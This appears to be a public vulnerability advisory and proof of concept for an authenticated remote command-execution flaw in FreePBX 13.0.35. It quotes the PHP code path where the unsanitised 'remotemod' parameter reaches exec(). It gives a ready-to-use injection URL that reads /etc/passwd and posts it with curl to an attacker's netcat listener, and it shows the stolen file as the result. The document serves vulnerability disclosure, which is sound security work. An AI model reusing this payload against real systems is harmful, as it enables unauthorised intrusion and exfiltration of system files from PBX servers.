135 lines
No EOL
5.3 KiB
Text
135 lines
No EOL
5.3 KiB
Text
Vulnerable software : Freepbx
|
|
Tested version : 13.0.35
|
|
vendor : freepbx.org
|
|
Author : Ahmed sultan (0x4148)
|
|
Email : 0x4148@gmail.com
|
|
|
|
Summary :
|
|
|
|
FreePBX is a web-based open source GUI (graphical user interface) that controls and manages Asterisk (PBX), an open source communication server,
|
|
With over 1 MILLION production systems worldwide and 20,000 new systems installed monthly,
|
|
the FreePBX community continues to out-perform the industry's commercial efforts.
|
|
The FreePBX EcoSystem has developed over the past decade to be the most widely deployed open source PBX platform in use across the world.
|
|
|
|
Vulnerability details :
|
|
|
|
Freepbx suffer from (Authenticated) remote code execution flaw
|
|
|
|
Boring technical stuff
|
|
|
|
File : functions.inc.php
|
|
|
|
function get_headers_assoc($url) {
|
|
global $amp_conf;
|
|
if ($amp_conf['MODULEADMINWGET']) {
|
|
FreePBX::Curl()->setEnvVariables();
|
|
exec("wget --spider --server-response -q ".$url." 2>&1", $wgetout, $exitstatus);
|
|
$headers = array();
|
|
if($exitstatus == 0 && !empty($wgetout)) {
|
|
foreach($wgetout as $value) {
|
|
$ar = explode(':', $value);
|
|
$key = trim($ar[0]);
|
|
if(isset($ar[1])) {
|
|
$value = trim($ar[1]);
|
|
$headers[strtolower($key)] = trim($value);
|
|
}
|
|
|
|
the $url is not being sanitized before being passed to the 'exec' function which lead to Command execution flaw
|
|
The function is being called at
|
|
|
|
File : libraries/modulefunctions.class.php
|
|
|
|
Line 1539 : function handledownload($module_location, $progress_callback = null) {
|
|
...................................................
|
|
// invoke progress callback
|
|
if (!is_array($progress_callback) && function_exists($progress_callback)) {
|
|
$progress_callback('getinfo', array('module'=>$modulename));
|
|
} else if(is_array($progress_callback) && method_exists($progress_callback[0],$progress_callback[1])) {
|
|
$progress_callback[0]->$progress_callback[1]('getinfo', array('module'=>$modulename));
|
|
}
|
|
|
|
$file = basename($module_location);
|
|
$filename = $amp_conf['AMPWEBROOT']."/admin/modules/_cache/".$file;
|
|
|
|
// Check each URL until get_headers_assoc() returns something intelligible. We then use
|
|
// that URL and hope the file is there, we won't check others.
|
|
-=>>>>>> $headers = get_headers_assoc($module_location);
|
|
if (empty($headers)) {
|
|
return array(sprintf(_('Failed download module tarball from %s, server may be down'),$module_location));
|
|
}
|
|
|
|
the handledownload function is called via the admin panel whenever the page.modules.php file is included
|
|
which can be basically done using admin/config.php?display=modules
|
|
|
|
File : page.modules.php
|
|
|
|
Line 174 : switch ($action) {
|
|
..............................
|
|
Line 643 : case 'upload':
|
|
..............................
|
|
Line 658 : $displayvars['processed'] = false;
|
|
if (isset($_REQUEST['upload']) && isset($_FILES['uploadmod']) && !empty($_FILES['uploadmod']['name'])) {
|
|
$displayvars['res'] = $modulef->handleupload($_FILES['uploadmod']);
|
|
$displayvars['processed'] = true;
|
|
} elseif (isset($_REQUEST['download']) && !empty($_REQUEST['remotemod'])) {
|
|
$displayvars['res'] = $modulef->handledownload($_REQUEST['remotemod']);
|
|
$displayvars['processed'] = true;
|
|
} elseif(isset($_REQUEST['remotemod'])) {
|
|
$displayvars['res'][] = 'Nothing to download or upload';
|
|
$displayvars['processed'] = true;
|
|
}
|
|
|
|
the 'remotemod' parameter is passed to exec function without being sanitized , which lead to the mentioned flaw
|
|
|
|
POC
|
|
|
|
On attacker's side run nc -lvp 8080
|
|
|
|
on target's side loginto the panel and then browse to
|
|
|
|
http://TARGET/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x" http://Attacker_server:8080/0x4148.jnk
|
|
|
|
Result
|
|
|
|
[0x4148:/lab]# nc -lvp 8080
|
|
listening on [any] 8080 ...
|
|
DNS fwd/rev mismatch: x.x.x.x != xxxxxx.com
|
|
connect to [ATTACKER] from x.x.x.x.x [Target] 45934
|
|
POST //0x4148.jnk HTTP/1.1
|
|
User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2
|
|
Host: ATTACKER:8080
|
|
Accept: */*
|
|
Content-Length: 1391
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Expect: 100-continue
|
|
|
|
root:x:0:0:root:/root:/bin/bash
|
|
bin:x:1:1:bin:/bin:/sbin/nologin
|
|
daemon:x:2:2:daemon:/sbin:/sbin/nologin
|
|
adm:x:3:4:adm:/var/adm:/sbin/nologin
|
|
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
|
|
sync:x:5:0:sync:/sbin:/bin/sync
|
|
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
|
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
|
|
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
|
|
operator:x:11:0:operator:/root:/sbin/nologin
|
|
games:x:12:100:games:/usr/games:/sbin/nologin
|
|
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
|
|
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
|
|
nobody:x:99:99:Nobody:/:/sbin/nologin
|
|
dbus:x:81:81:System message bus:/:/sbin/nologin
|
|
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
|
|
asterisk:x:499:498::/home/asterisk:/bin/bash
|
|
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
|
|
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
|
|
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
|
|
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
|
|
ntp:x:38:38::/etc/ntp:/sbin/nologin
|
|
saslauth:x:497:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
|
|
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
|
|
apache:x:48:48:Apache:/var/www:/sbin/nologin
|
|
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
|
|
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
|
|
prosody:x:496:495::/var/lib/prosody:/sbin/nologin
|
|
tcpdump:x:72:72::/:/sbin/nologin |